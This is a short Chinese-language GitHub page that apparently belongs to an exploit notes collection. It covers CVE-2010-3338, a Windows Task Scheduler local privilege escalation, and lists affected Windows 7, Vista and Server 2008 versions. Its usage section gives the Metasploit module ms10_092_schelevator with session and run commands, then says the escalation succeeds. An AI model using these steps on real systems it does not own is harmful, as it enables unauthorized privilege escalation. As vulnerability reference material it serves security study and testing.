Skip to content

Latest commit

 

History

History
 
 

CVE-2010-3338

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 

CVE-2010-3338

描述

Windows Task Scheduler无法正确确定计划任务的安全上下文,这使本地用户可以通过精心设计的应用程序获取特权

影响版本

Product CPU Architecture Version Update Tested
Windows 7
Windows Server 2008 SP2
Windows Server 2008
Windows Server 2008 R2
Windows Vista SP1
Windows Vista SP2

利用方式

测试系统 Windows Server 2008 SP2 x86,利用msf执行如下命令即可,x64版本msf不支持

use exploit/windows/local/ms10_092_schelevator
set SESSION 2
run

image-20200822234422637

然后就能提权成功了

image-20200822234608009